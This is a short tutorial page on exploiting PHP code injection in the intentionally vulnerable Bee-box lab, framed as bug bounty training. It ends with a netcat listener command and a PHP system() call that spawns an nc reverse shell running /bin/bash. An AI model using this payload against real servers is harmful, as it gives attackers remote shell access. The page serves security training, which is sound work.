Bug Bounty Hunting - PHP Code Injection

Video Tutorial

PHP Code Injection

PHP code injection is a vulnerability that allows an attacker to inject custom code into the server side scripting engine.

Tools we will be using

  • Bee-box

Getting started

  • If we click on the message, it echos data back. So we know the PHP code is executing correctly.
  • We can also see this in the URL, with the message parameter.
  • We can change the echo message, however, if we try other data like HTML tags (HTML Injection) we get no output.
  • So we have established that the message is being processed by the server.
  • If we insert a PHP statement terminator (semicolon) we can execute more commands with the PHP system call.

A great way of taking advantage of PHP code injection is by using the system call.


Getting a reverse shell

Setup a netcat listener - nc -nvlp 1234

Execute nc with system call - system(“nc 1234 -e /bin/bash”);